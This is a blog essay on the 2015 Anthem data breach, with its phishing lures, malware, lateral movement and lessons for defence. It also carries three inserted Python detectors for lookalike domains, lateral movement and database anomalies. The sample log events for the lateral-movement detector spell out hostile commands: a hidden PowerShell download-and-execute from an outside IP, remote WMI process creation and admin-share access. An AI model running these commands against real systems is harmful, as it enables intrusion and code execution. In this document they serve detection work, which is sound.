Take Out — How Anthem was Breached

Bishr Tabbaa
11 min read · Feb 17, 2019


The fourth anniversary of the Anthem data breach is an opportunity to reflect upon computer system failures, human error, process flaws, organizational mistakes, and the best principles and practices for solution delivery in the IT industry. In this blog and my upcoming book, Bugs: A Short History of Computer System Failure, I will chronicle some important system failures of the past and discuss ideas for improving the future of system quality. As information technology becomes increasingly woven into daily life, the quality of hardware and software affects our commerce, health, infrastructure, military, politics, science, security, and transportation. The Big Idea is that we have no choice but to get better at delivering technology solutions, because our lives depend on it.

On February 4, 2015, Anthem, a major US health insurance company, announced to the general public that an attacker had gained access to its database and that 78.8 million records of Personally Identifiable Information (PII) were exposed, including name, address, birth date, Medical ID, and Social Security Number (SSN). In the weeks and months that followed, investigators learned that Anthem employees had been targeted by a cyber warfare group affiliated with the government of the People’s Republic of China (PRC); this group, known by aliases such as “Deep Panda” and “Black Vine”, had launched a sophisticated attack that lured users with phishing emails linking to malicious websites masquerading as internal services, installed malware on their machines, and then compromised multiple user accounts throughout the Anthem network until the attackers were able to access and exfiltrate the corporate data warehouse containing the customer PII. Anthem spent approximately $230 million on the cleanup of the data breach, including the purchase of a cyber security insurance policy, class-action settlements, and additional security services and cyber defenses. For full disclosure to the reader, I was a customer of Anthem at the time of the event and was affected by it. This essay discusses the details of the data breach that were made public, the business and technology factors that contributed to the system failure, and how to prevent such incidents from happening to your organization.

Headquartered in Indianapolis, Anthem grew from the union of two Indiana-based insurance companies, Mutual Hospital Insurance Inc and Mutual Medical Insurance Inc, formed in 1944 and 1946 respectively. Anthem became a publicly traded corporation in 2001 and, in so doing, consolidated the Blue Cross Blue Shield organizations of several states to achieve further economies of scale. In November 2004, Anthem and WellPoint merged to become the leading health benefits corporation in the USA and the largest for-profit licensee within the Blue Cross and Blue Shield Association. Through its portfolio of healthcare plans and services, Anthem serves over 40 million members and operates in 19 states; 1 in 8 Americans is covered by Anthem and, of interest from a reconnaissance perspective, so is about 1 in 2 US federal government employees. For fiscal year 2017, Anthem reported US$3.8 billion in earnings on annual revenue of $90 billion; it handled more than 50 million service calls and processed more than 700 million claims that year.

Threat Connect Analysis of Anthem Data Breach

According to multiple documents published by Symantec, ThreatConnect, and the US government, a system administrator in Anthem’s Amerigroup subsidiary opened a phishing email in early 2014 that carried a malicious attachment and embedded links to typosquat web sites controlled by the Deep Panda group. The fake sites, including myhrsolutions.we11point.com, extcitrix.we11point.com, prennera.com, and sharepoint-vaeit.com, posed as legitimate HR and IT services within the Anthem and Blue Cross enterprise network; in reality they hosted command-and-control infrastructure for the Mivast and Sakula malware, which was digitally signed with certificates stolen from DTOPTOOLZ, a Korean software company. According to Symantec, Mivast and Sakula share the following capabilities: open an I/O pipe as a backdoor command-and-control communications channel, execute files and commands, delete, modify, and create Windows registry keys, and collect and send information about the infected computer. In addition to the disguised host names, the malware was themed as an Adobe Reader, Juniper VPN, or Microsoft ActiveX Control application to appear innocuous to the user. Once the attackers controlled the sysadmin’s account and computer, they moved laterally within Anthem’s network, compromising dozens more user accounts and escalating privileges as they discovered additional target systems. On December 10, 2014, the attackers queried and exfiltrated the PII data from the corporate data warehouse. The suspiciously large query was logged, but it was not noticed by Anthem’s IT department until January 26, 2015. Three days later, Anthem shut down the sysadmin account and then notified federal authorities as well as other regulatory entities. The we11point.com domain had originally been registered on April 21, 2014; the registrant’s address was later changed from China to the Cayman Islands to obscure its origin. Further analysis by ThreatConnect of the malware’s network callbacks resolved them to the IP addresses 198.200.45.112 and 192.199.254.126, which pointed to a suspicious domain (topsec2014.com) and registrant email address (topsec_2014@163.com).
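The lookalike domains above (we11point.com for wellpoint.com, with the digit 1 standing in for the letter l) can be caught mechanically before a user ever clicks. The following Python script is an added example, not code from the article or from any of the reports it cites: it folds each character of a domain label to what a reader’s eye would see, then compares the result against a list of protected brand names. The brand list, the set of legitimate domains, the confusable-character table, and the candidate hosts fed to it are constructed for the example and deliberately small.

```python
"""Lookalike-domain detector (added example, not from the original article).

Flags hosts that impersonate a protected brand the way we11point.com
impersonated wellpoint.com. The brand list, legitimate-domain set and
confusable tables below are constructed for this example.
"""
import unicodedata
from typing import Optional, Tuple

# Single characters that read as another letter in common UI fonts.
# Assumption: this short table covers the brands below; a production tool
# would load the full Unicode confusables list instead.
CONFUSABLE_CHARS = {"1": "l", "|": "l", "!": "i", "0": "o", "5": "s", "3": "e"}
# Two-character sequences that read as one letter ("rn" looks like "m").
CONFUSABLE_PAIRS = {"rn": "m", "vv": "w"}

PROTECTED_BRANDS = ["wellpoint", "anthem", "amerigroup"]           # constructed
LEGIT_DOMAINS = {"wellpoint.com", "anthem.com", "amerigroup.com"}   # constructed


def fold(label: str) -> str:
    """Reduce a host label to the ASCII string a reader's eye would see."""
    s = unicodedata.normalize("NFKD", label.lower())
    s = "".join(c for c in s if not unicodedata.combining(c))  # drop accents
    for pair, single in CONFUSABLE_PAIRS.items():
        s = s.replace(pair, single)
    return "".join(CONFUSABLE_CHARS.get(c, c) for c in s)


def registrable_domain(host: str) -> str:
    """Assumption: a two-label suffix (brand.com); no public-suffix list here."""
    parts = host.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; small inputs, so the O(len(a)*len(b)) loop is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host: str) -> Optional[Tuple[str, str]]:
    """Return (reason, brand) when host looks like an impersonation, else None."""
    reg = registrable_domain(host)
    if reg in LEGIT_DOMAINS:
        return None
    sld = reg.split(".")[0]            # second-level label, e.g. "we11point"
    seen = fold(sld)
    for brand in PROTECTED_BRANDS:
        if seen == brand and sld != brand:
            return ("homoglyph", brand)        # only confusable characters differ
        if levenshtein(seen, brand) == 1:
            return ("near-miss", brand)        # one typo away from the brand
        if brand in seen and seen != brand:
            return ("brand-embedded", brand)   # brand plus extra words or hyphens
    return None


if __name__ == "__main__":
    # Candidate hosts: the article's lures plus constructed variants.
    for h in ["myhrsolutions.we11point.com", "extcitrix.we11point.com",
              "arnerigroup.com", "anthern-benefits.com", "welpoint.com",
              "wellpoint.com", "sharepoint-vaeit.com"]:
        print(f"{h:32} {classify(h)}")
```

sharepoint-vaeit.com comes back clean, which is the caveat: a lure that never reuses the brand name escapes this check entirely, so lookalike detection on new registrations and proxy logs complements, rather than replaces, controls on the links and attachments themselves.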

Topsec Information Security Research Center of Southeast University

ThreatConnect investigated the usage of “topsec2014@163[.]com” and connected it to Professor Song Yubo who was running an active information security competition sponsored by the Topsec Information Security Research Center (TISRC) of Southeast University located in Nanjing, China. This entity appears to be a joint venture between the university and Beijing Topsec, a major Chinese telecommunications and IT security company. In 1996, Topsec was the first Chinese company to release an indigenously-manufactured firewall hardware appliance. In March 2012, Northrop Grumman had presented a commissioned report to Congress describing Chinese cyber warfare capabilities; the report asserted that Professor Song and the TISRC had received numerous state-sponsored research grants related to computer security research, development, and operations. Topsec has connections to the Chinese government, is a People’s Liberation Army (PLA) vendor with military clearance, and had provided networking and cybersecurity services to several high profile national events including the 2008 Beijing Olympics, Shanghai 2010 Expo, as well as the launches of the Tiangong-1 space station and Shenzhou spacecrafts.

Moreover, Symantec postulated that the geography of the network infrastructure, the malware variants, and the digital certificates used against Anthem were all associated with the Deep Panda group. Since 2012, Deep Panda had launched multiple cyber warfare campaigns against organizations in important industries including aerospace, energy, finance, military, and technology, focusing on digital assets such as intellectual property and PII; 82% of the victims were located in the USA, 4% each in Canada and China, 3% each in Denmark and Italy, and 2% in India. Furthermore, Deep Panda had a history of exploiting zero-day vulnerabilities at the same time as other groups, and Symantec suggested that it was actively using the Elderwood platform to distribute the exploits, typically via spear phishing emails, watering holes, and web injection. Remote code execution vulnerabilities from the Elderwood program included Adobe Flash Player Object Type Confusion (CVE-2012-0779), Microsoft Internet Explorer Same ID Property (CVE-2012-1875), and Microsoft XML Core Services (CVE-2012-1889). Once inside the enterprise network, Deep Panda relied on a more standard toolkit: ping to identify other machines, PowerShell to download and execute programs in memory without writing to disk, Windows Management Instrumentation (WMI) for lateral movement, process discovery with the Microsoft tasklist.exe utility, and net.exe to connect to administrative network shares with compromised credentials. Every one of these is a legitimate administrative tool, so detection has to rest on the combination of behaviours seen from one account rather than on any single command.
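Because each tool in that list is built into Windows, the useful signal is the combination. The following Python detection logic is an added example, not from the article or from Symantec’s report: it scans process-creation records whose fields are loosely modelled on Sysmon Event ID 1 and Windows security event 4688 (host, account, image path, command line), maps each record to one of the five behaviours described above, and reports every host and account pair that exhibits at least three of them. The sample events are constructed for the example, not real Anthem telemetry, and the ping-sweep threshold is an assumption.

```python
"""Lateral-movement detection over process-creation records (added example,
not from the original article or any vendor report).

Scores each (host, account) pair on the five behaviours the article lists:
ping sweeps, PowerShell in-memory download/execute, WMI remote process
creation, tasklist discovery, and net.exe use of administrative shares.
The sample events below are constructed, not real telemetry.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

ADMIN_SHARE = re.compile(r"\\\\[\w.-]+\\(c\$|admin\$|ipc\$)", re.I)
PS_IN_MEMORY = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string"
    r"|-enc(odedcommand)?\b", re.I)                # "-Encoding utf8" does not match
WMI_REMOTE_EXEC = re.compile(r"process\s+call\s+create|invoke-wmimethod|/node:", re.I)
PING_SWEEP_MIN_TARGETS = 5   # assumption: fewer distinct targets is routine troubleshooting


def technique(ev: dict) -> Optional[str]:
    """Map one process-creation event to the behaviour it evidences, if any."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmd"]
    if image == "ping.exe":
        return "ping"                      # becomes a sweep only if many targets
    if image in ("powershell.exe", "pwsh.exe") and PS_IN_MEMORY.search(cmd):
        return "ps_inmem"
    if image in ("wmic.exe", "powershell.exe") and WMI_REMOTE_EXEC.search(cmd):
        return "wmi_exec"
    if image == "tasklist.exe":
        return "proc_discovery"
    if image == "net.exe" and ADMIN_SHARE.search(cmd):
        return "admin_share"               # \\host\C$ etc.; ordinary shares ignored
    return None


def score(events: List[dict], min_techniques: int = 3) -> Dict[Tuple[str, str], List[str]]:
    """Return {(host, user): sorted techniques} for pairs showing >= min_techniques."""
    techs: Dict[Tuple[str, str], set] = defaultdict(set)
    ping_targets: Dict[Tuple[str, str], set] = defaultdict(set)
    for ev in events:
        key = (ev["host"], ev["user"])
        t = technique(ev)
        if t == "ping":
            ping_targets[key].add(ev["cmd"].split()[-1])   # last token is the target
        elif t:
            techs[key].add(t)
    for key, targets in ping_targets.items():
        if len(targets) >= PING_SWEEP_MIN_TARGETS:
            techs[key].add("ping_sweep")
    return {k: sorted(v) for k, v in techs.items() if len(v) >= min_techniques}


def _ev(host: str, user: str, image: str, cmd: str) -> dict:
    return {"host": host, "user": user, "image": image, "cmd": cmd}


SYS32 = "C:\\Windows\\System32\\"
SAMPLE_EVENTS = (
    # A compromised admin on WS-101 working through the toolkit (constructed).
    [_ev("WS-101", "CORP\\admin1", SYS32 + "PING.EXE", f"ping -n 1 10.1.2.{n}")
     for n in range(40, 46)]
    + [
        _ev("WS-101", "CORP\\admin1", SYS32 + "WindowsPowerShell\\v1.0\\powershell.exe",
            "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://198.51.100.7/a.ps1')\""),
        _ev("WS-101", "CORP\\admin1", SYS32 + "wbem\\WMIC.exe",
            "wmic /node:DB-01 process call create \"cmd /c whoami\""),
        _ev("WS-101", "CORP\\admin1", SYS32 + "tasklist.exe", "tasklist /S DB-01"),
        _ev("WS-101", "CORP\\admin1", SYS32 + "net.exe",
            "net use \\\\DW-01\\C$ /user:CORP\\admin1 *"),
        # Ordinary activity from another user (constructed); must not be flagged.
        _ev("WS-202", "CORP\\jdoe", SYS32 + "PING.EXE", "ping -n 4 fileserver"),
        _ev("WS-202", "CORP\\jdoe", SYS32 + "net.exe", "net use \\\\fileserver\\public"),
        _ev("WS-202", "CORP\\jdoe", SYS32 + "tasklist.exe", "tasklist"),
    ]
)

if __name__ == "__main__":
    for (host, user), seen in score(SAMPLE_EVENTS).items():
        print(f"{host} {user}: {', '.join(seen)}")
```

The threshold of three behaviours is a tuning knob, not a rule: the point is that jdoe’s single tasklist and ordinary file-share mapping score one technique and stay below it, while admin1 trips all five.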

McKinsey Cybersecurity Policy Framework

One may well wonder how to defend oneself and one’s organization against such powerful and patient adversaries. The following principles and practices for preventing, detecting, and reacting to a data breach draw on the cybersecurity frameworks published by the US National Institute of Standards and Technology (NIST), the Center for Internet Security (CIS/SANS), and ISO 27001.

  • Identify and Inventory the assets that are important to your organization. It could be Intellectual Property (IP), financial data, patient information, e-mail, business processes like trading, payments, research, document approval, or supply chains, as well as physical facilities and devices (e.g. drones, planes, cars, robots), etc.
  • Prioritize what you need to Protect. Not all assets are created equal. Make sure you have identified and secured the most critical assets.
  • Assess the Gaps in current Defenses and improve the areas where the Risks to critical assets are highest. Maintain secure configurations for hardware and software on mobile devices, laptops, workstations, and servers. Maintain, monitor, and analyze audit and security logs. Protect corporate email and web browsers, which are common attack vectors. Limit and control network ports, protocols, and services using firewalls and intrusion detection systems (IDS). Maintain secure configurations for network devices such as firewalls, routers, and switches. Invest in data backup, protection, and recovery capabilities. Monitor the OWASP Top 10 and SANS Top 25 to appreciate how threats change over time. Patch servers, applications, and devices for major vulnerabilities, and do so regularly. Document policies and procedures for cybersecurity. Anthem should have considered enforcing Two-Factor Authentication (2FA) to make stolen sysadmin credentials harder to reuse and to reduce the impact of a hacked account; note that 2FA raises the cost of credential theft but does not by itself stop an attacker who already controls the administrator’s workstation and can ride its authenticated sessions, so it must be paired with endpoint monitoring and privileged-access controls. Anthem also should have had stronger automated email controls, such as an email proxy service for blocking spam, removing suspicious file attachments, and disabling web links embedded in email.
  • Educate employees and contractors within the organization on computer security hygiene, organization policy, and the consequences of non-conformance. Individuals should be as careful opening emails as they would be opening the door to their home. Implement a security training program for application software engineers and system administrators.
  • Assess Data storage and security. What data is stored? Is it financial, PII, or HIPAA-related? What government regulations and legal jurisdictions cover that information? What components control access to the data? How are users authenticated and authorized? Is user activity logged? Is data encrypted, and if so, how are encryption keys managed? Block data distribution methods that violate company policy (e.g. USB drives, Dropbox) so that even if an attacker breaches the network, extracting the data is difficult; note that in Anthem’s case the data left over the attackers’ own command-and-control channel, so such controls must be paired with egress monitoring and alerting on unusually large queries or transfers. A more complex approach partitions the data across multiple servers or locations. Furthermore, the adverse impacts of healthcare data breaches, including identity theft, insurance fraud, loss of personal privacy, blackmail, disruption of healthcare services, and espionage, warrant increased penalties upon organizations that fail to secure data covered by HIPAA. As noted earlier, about 1 in 2 federal government employees were members of Anthem; no PII dump from Anthem’s database has yet appeared for sale on the dark web, suggesting the hack was not done for short-term monetary reward. Rather, it may well be that the foreign state actors involved sought medical information about US officials to identify health vulnerabilities and thereby gain an advantage in future business or diplomatic negotiations.
  • Monitor and control User accounts. Limit the use of system administrative privileges and separate duties so that few users, if any, have complete power within the enterprise. For example, two people must provide separate keys to open a bank safe, two signatures are required on checks over a certain amount, and two individuals are required to present their fingerprint or retinal scan and turn the nuclear missile launch keys. Compromised network user credentials should not have carried database administrator (DBA) permissions. There should be distinct role definitions with different levels of access and permissions for the DBA, system architect, application lead, support analyst, and business users.
  • Define an Incident Response (IR) plan to react intelligently and recover quickly if and when the worst case happens. Like fire extinguishers, regular planning and practice improve outcomes.
  • Conduct penetration tests and Red Team exercises on high value assets to assess defenses.
  • If you are an individual consumer affected by a data breach involving PII, request a security freeze on your credit file with the major credit reporting companies (Equifax, Experian, and TransUnion). Also consider ID protection and credit monitoring services. Change your passwords on critical accounts and consider using password manager software. Keep the antivirus and other security software on your workstation and mobile devices up to date.
Fake we11point.com site that tricked Anthem employees
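The December 10 query was logged but went unnoticed for seven weeks, so the monitoring point in the list above deserves a concrete shape. The following Python check is an added example, not Anthem’s or any vendor’s tooling: it reads database audit rows (day, account, table, rows returned), derives each account’s daily baseline from an initial window, and flags any later day whose volume is both above an absolute cap and far above that account’s own baseline, as well as any first-time access to a sensitive table by an account that never touched it during the baseline. The audit rows, table names, and thresholds are constructed for the example; the 78.8 million figure is the article’s record count used as a sample row count, not a real audit entry.

```python
"""Volume-anomaly check for database audit logs (added example, not Anthem's
or any vendor's tooling). Audit rows, table names and thresholds are
constructed for this example.
"""
from collections import defaultdict
from statistics import median
from typing import Dict, List, Set, Tuple

Row = Tuple[str, str, str, int]        # (day, account, table, rows_returned)

SENSITIVE_TABLES = {"member_pii"}      # assumption
ABS_CAP = 1_000_000                    # rows per account per day; assumption
BASELINE_MULTIPLIER = 20               # assumption


def _baseline(rows: List[Row], baseline_end: str):
    """Per-account median daily volume and tables touched up to baseline_end."""
    per_day: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    tables: Dict[str, Set[str]] = defaultdict(set)
    for day, acct, table, n in rows:
        if day <= baseline_end:        # ISO dates order correctly as strings
            per_day[acct][day] += n
            tables[acct].add(table)
    return {a: median(d.values()) for a, d in per_day.items()}, tables


def find_anomalies(rows: List[Row], baseline_end: str) -> List[tuple]:
    """Alerts for days after baseline_end: (day, account, kind, detail)."""
    med, seen_tables = _baseline(rows, baseline_end)
    daily: Dict[Tuple[str, str], int] = defaultdict(int)
    touched: Dict[Tuple[str, str], Set[str]] = defaultdict(set)
    for day, acct, table, n in rows:
        if day > baseline_end:
            daily[(day, acct)] += n
            touched[(day, acct)].add(table)
    alerts = []
    for (day, acct), n in sorted(daily.items()):
        base = med.get(acct, 0)        # unknown account: cap alone decides
        # Both conditions: the absolute cap suppresses noise from tiny
        # baselines; the multiplier keeps big batch accounts from tripping
        # on a normal day.
        if n > ABS_CAP and n > BASELINE_MULTIPLIER * base:
            alerts.append((day, acct, "volume", n))
        new = (touched[(day, acct)] & SENSITIVE_TABLES) - seen_tables.get(acct, set())
        if new:
            alerts.append((day, acct, "new_sensitive_access", sorted(new)))
    return alerts


def _sample() -> List[Row]:
    """Constructed audit rows: two weeks of routine load, then the breach day."""
    rows: List[Row] = []
    base_days = ([f"2014-11-{d:02d}" for d in range(24, 31)]
                 + [f"2014-12-{d:02d}" for d in range(1, 6)])
    for i, day in enumerate(base_days):
        rows.append((day, "svc_reporting", "claims", 40_000 + 500 * i))   # nightly batch
        rows.append((day, "dba1", "member_pii", 5_000 + 100 * i))         # routine DBA work
    rows += [
        ("2014-12-08", "svc_reporting", "claims", 46_000),
        ("2014-12-09", "dba1", "member_pii", 150_000),    # ~30x baseline but under the cap
        ("2014-12-10", "dba1", "member_pii", 6_000),
        ("2014-12-10", "sysadmin1", "member_pii", 78_800_000),  # account never seen on this table
    ]
    return rows


SAMPLE_AUDIT = _sample()

if __name__ == "__main__":
    for alert in find_anomalies(SAMPLE_AUDIT, "2014-12-05"):
        print(alert)
```

The dba1 spike on December 9 is left alone on purpose: it is large relative to that account but below the absolute cap, so the two-condition rule treats it as a maintenance job rather than an exfiltration. A real deployment would run this nightly against the warehouse’s audit log and page on any alert rather than waiting for someone to read the log by hand.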

Anthem paid a price for the data breach, with financial costs totaling more than $230 million. It settled with the federal Office for Civil Rights (OCR) for a $16 million fine. Anthem also sent letters to the 78.8 million affected customers by USPS, and it offered free credit monitoring and ID protection services for up to 24 months. Anthem spent $115 million to settle civil class action lawsuits, and it purchased an insurance policy from American International Group (AIG) worth $100 million to cover incident fallout. It paid $2.5 million to Mandiant to assist with the investigation and recommend a remediation plan. Beyond the monetary expenses, Anthem also suffered reputational damage with its business and retail customers and has come under greater regulatory scrutiny. Now consider that Anthem had already experienced multiple data breach events in the past. In January 2007, WellPoint announced that 196,000 members had their PII (including SSN) exposed when backup tapes in a lockbox were stolen from a vendor, Concentra. In February 2010, a former Anthem employee pled guilty to ID theft involving at least 40 other employees’ PII. In July 2011, Anthem settled a lawsuit alleging that from October 2009 to March 2010 it had improperly stored PII and electronic versions of individual health insurance applications for over 600,000 customers without username, password, or encryption protection, because of an improper maintenance upgrade performed by a vendor. As cyber security and privacy experts such as Bruce Schneier and the EFF have noted, data breaches are an economic externality much like pollution of the air and water: there may be a short-term punishment for the responsible organization, but the long-term effects, costs, and risks are borne by individuals and society. Citizens, academics, and policy makers must demand from government and corporations that data be declared a toxic asset that needs to be regulated, reported, and secured as carefully as we do with nuclear waste.

Enjoy the article? Follow me on Medium and Twitter for more updates.


This story is published in The Startup, Medium’s largest entrepreneurship publication followed by +424,678 people.




Bishr Tabbaa

Architect @ AWS • Amazon Web Services • Board Member • Fractional CTO • Built B2B DNA supply chain stack @GxGene • History of System Failure • Writer @ Medium